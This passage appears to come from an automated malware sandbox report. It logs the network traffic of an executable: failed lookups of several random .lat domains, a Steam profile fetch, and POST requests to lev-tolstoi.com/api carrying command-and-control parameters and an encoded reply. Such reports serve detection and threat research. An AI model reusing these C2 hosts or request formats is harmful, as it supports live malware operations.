                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415608883 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417208910 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417332888 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.417337894 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.170610905 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.170721054 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.170821905 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.170953989 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.170974016 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.647893906 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.647960901 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.648061037 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.648375988 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:25.648391008 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.955081940 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.955348969 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.956809998 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.956820011 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.957117081 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.958554029 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959383011 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959433079 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959548950 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959570885 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959686041 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959711075 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959820986 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959836006 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.959995031 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.960010052 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.960088968 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.960099936 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.960165024 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:26.960200071 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.003324986 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.003535032 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.003582954 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.003591061 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.047328949 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.047456026 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.047575951 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.047606945 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.091375113 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.091584921 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.091660023 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.133181095 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.133208036 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:27.322590113 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.742396116 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.742502928 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.742580891 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.743135929 CET49768443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.743153095 CET44349768172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.813807964 CET49776443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.813864946 CET44349776172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.814028978 CET49776443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.814393044 CET49776443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:29.814408064 CET44349776172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:30.039493084 CET49776443192.168.2.9172.67.157.254

                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.073515892 CET5075953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.211363077 CET53507591.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.257509947 CET5050853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.395258904 CET53505081.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.397092104 CET5993153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.764199018 CET53599311.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.767452955 CET5426053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.905788898 CET53542601.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.907983065 CET5249853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.046942949 CET53524981.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.050281048 CET5051953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.188666105 CET53505191.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.191673040 CET5655353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.330864906 CET53565531.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.334563971 CET6023253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.474477053 CET53602321.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.476243019 CET5355853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.617562056 CET53535581.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.621043921 CET5567553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.759224892 CET53556751.1.1.1192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.298597097 CET6163253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.436800003 CET53616321.1.1.1192.168.2.9

                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.073515892 CET192.168.2.91.1.1.10x4895Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.257509947 CET192.168.2.91.1.1.10xae78Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.397092104 CET192.168.2.91.1.1.10x90f0Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.767452955 CET192.168.2.91.1.1.10x6cbbStandard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.907983065 CET192.168.2.91.1.1.10xfa0aStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.050281048 CET192.168.2.91.1.1.10xd22dStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.191673040 CET192.168.2.91.1.1.10xf5e3Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.334563971 CET192.168.2.91.1.1.10x9b17Standard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.476243019 CET192.168.2.91.1.1.10xd2bStandard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.621043921 CET192.168.2.91.1.1.10x84eeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.298597097 CET192.168.2.91.1.1.10x2a63Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 26, 2024 12:53:58.900741100 CET1.1.1.1192.168.2.90xa0b8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:53:58.900741100 CET1.1.1.1192.168.2.90xa0b8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.211363077 CET1.1.1.1192.168.2.90x4895Name error (3)observerfry.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.395258904 CET1.1.1.1192.168.2.90xae78Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.764199018 CET1.1.1.1192.168.2.90x90f0Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:06.905788898 CET1.1.1.1192.168.2.90x6cbbName error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.046942949 CET1.1.1.1192.168.2.90xfa0aName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.188666105 CET1.1.1.1192.168.2.90xd22dName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.330864906 CET1.1.1.1192.168.2.90xf5e3Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.474477053 CET1.1.1.1192.168.2.90x9b17Name error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.617562056 CET1.1.1.1192.168.2.90xd2bName error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.759224892 CET1.1.1.1192.168.2.90x84eeNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.436800003 CET1.1.1.1192.168.2.90x2a63No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.436800003 CET1.1.1.1192.168.2.90x2a63No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                      • lev-tolstoi.com

                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.94972223.55.153.1064431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:10 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:09 GMT
                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: sessionid=8c1a4b1771d075e6ff806249; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                      2024-12-26 11:54:10 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                      2024-12-26 11:54:10 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                      2024-12-26 11:54:10 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.949728172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:11 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                      2024-12-26 11:54:12 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:12 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=o4p9lba5g4i9qtomora9luftp3; expires=Mon, 21 Apr 2025 05:40:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQE3qx5emZfLpX0T%2BBQvwCyNKDQruLx8tktXeYe3ICZsZK%2By3GCjO6LAYan6gN%2BqoIav1DpzOZeesXXm7i52L%2BXeTzz04QPUUEZyootsmeFjDYcZ%2Fex6y%2BR2NmjL8Wft7HM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80dff1280c8ca5-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1957&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1385199&cwnd=237&unsent_bytes=0&cid=26a9a97ca4cc6b71&ts=784&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                      2024-12-26 11:54:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      2192.168.2.949734172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 47
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:13 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:14 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=odg15tm0b8em3rle5cbpg925ra; expires=Mon, 21 Apr 2025 05:40:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc5cxzl51rkgbfAcfvZf5WoCLbXuegv87R2Zd7pMIBbqJJFVzmw%2Ffj38SCwr7XGEu95tgcazOLw6l5CIy76pXGBAusXwrsfl31McViHvCXfbZEBI0QTsnTjyu%2FgSU2syncQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80dffe7d907c69-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1975&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1423695&cwnd=171&unsent_bytes=0&cid=57f353ebc0ea2fb6&ts=791&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC248INData Raw: 63 34 62 0d 0a 55 4f 38 42 42 57 6b 2f 77 58 6e 46 6c 44 58 63 6f 41 7a 66 31 6f 33 6d 54 55 6e 7a 2b 69 59 6a 4d 45 69 35 46 4c 31 34 4b 41 30 72 7a 58 63 6e 55 77 76 74 57 37 62 78 46 2b 62 55 66 71 71 7a 6f 63 51 73 4c 64 48 41 51 45 4a 63 4f 39 77 34 6e 77 35 46 4c 32 71 4a 59 47 6b 61 57 75 31 62 6f 4f 77 58 35 76 74 33 2f 62 50 6a 78 48 64 72 6c 70 42 45 51 6c 77 71 32 48 2f 53 43 45 52 75 4f 49 4e 6d 62 51 78 63 70 52 69 70 2b 56 43 35 78 57 32 31 75 4f 53 4c 4a 53 54 52 31 67 52 47 53 6d 71 44 4e 76 41 64 58 47 77 64 6a 6e 4a 75 53 30 4c 74 41 75 66 78 57 2f 36 61 4c 72 36 7a 37 34 6f 72 4c 5a 69 53 54 6b 74 55 4b 39 31 2b 7a 52 46 4f 5a 54 69 4e 5a 57 77 47 56 62 45 56 6f 2f 35 62 76 38 39 74 2f 66 71 76 67 7a 64 72 79 64 67
                                                                                                                                                                                                                                                      Data Ascii: c4bUO8BBWk/wXnFlDXcoAzf1o3mTUnz+iYjMEi5FL14KA0rzXcnUwvtW7bxF+bUfqqzocQsLdHAQEJcO9w4nw5FL2qJYGkaWu1boOwX5vt3/bPjxHdrlpBEQlwq2H/SCERuOINmbQxcpRip+VC5xW21uOSLJSTR1gRGSmqDNvAdXGwdjnJuS0LtAufxW/6aLr6z74orLZiSTktUK91+zRFOZTiNZWwGVbEVo/5bv89t/fqvgzdrydg
